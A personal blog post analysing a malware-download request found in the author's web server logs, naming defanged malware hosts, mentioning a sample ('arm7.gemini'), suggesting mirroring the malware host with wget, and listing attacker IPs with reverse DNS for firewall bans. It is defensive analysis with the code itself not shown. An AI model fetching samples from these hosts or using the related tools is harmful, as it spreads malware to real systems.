When I was reading logs from my WWW server I found that there is some 'old and known' string - but with the 'new' (attackers) IP(s):
As you can see there are few IPs but they are asking 2 hosts for the file. So we have now:
-- hxxp://g;mariokartayy;com
-- hxxp://104;244;72;82
Next step I tried (after I downloaded the file from log-request) was to read it ;)
So we found a sister everybody! ;D
I decided to 'beautify' the code a little bit:
Now it's better ;]
Checking:
Some more results from strings tool:
At this stage I decided to google a little bit. I used the string from the malware request (xml part with <NewStatusUrl code) and that's how I found some weird pastebin link:
According to the date the script is still 'fresh':
Reading the source you will find the line mentioned before:
I don't know why it's still at pastebin... Anyway, looking for other source codes available there you will find more weird tools, for example:
I would like to add one thing here: do not use those tools. It will probably be illegal.
Do only legal things.
At this stage I decided to get back to my shell and prepare small bash script to automate a bit the process of 'checking logs' and dropping 'bad-guys' ;)
For now we will have to ban on firewall(s) our winners:
[+] 156.196.247.242
242.247.196.156.in-addr.arpa domain name pointer host-156.196.242.247-static.tedata.net.
Country: MU
country: EG
--
[+] 156.199.87.116
116.87.199.156.in-addr.arpa domain name pointer host-156.199.116.87-static.tedata.net.
Country: MU
country: EG
--
[+] 156.201.76.26
26.76.201.156.in-addr.arpa domain name pointer host-156.201.26.76-static.tedata.net.
Country: MU
country: EG
--
[+] 156.220.219.222
222.219.220.156.in-addr.arpa domain name pointer host-156.220.222.219-static.tedata.net.
Country: MU
country: EG
--
[+] 197.33.174.107
107.174.33.197.in-addr.arpa domain name pointer host-197.33.174.107.tedata.net.
country: EG
--
[+] 41.47.40.149
149.40.47.41.in-addr.arpa domain name pointer host-41.47.40.149.tedata.net.
country: EG
--
[+] 92.4.84.196
196.84.4.92.in-addr.arpa domain name pointer host-92-4-84-196.as43234.net.
country: GB
Last view from the Ida, checking strings again:
Following selected line should get you here:
Cool, as we can see, code is prepared to check 3 variants to run another downloads...
(In the time of creating this post other binaries - like yeet - were not available for download, but if you would like to get a fresh sample, use wget --mirror. Maybe you will find something interesting to check;))
I tried to read few found samples (Ida) but the best to check in my opinion is arm7.gemini:
As this sample (case) is already described online I will leave it for you to play with it and do some research for yourself.
Good resources (I found during the analysis) you can find here:
- thanks to SeeBug
- thanks to Fortinet
- thanks to CheckPoint
See you next time ;)
Cheers
o/
Brak komentarzy:
Prześlij komentarz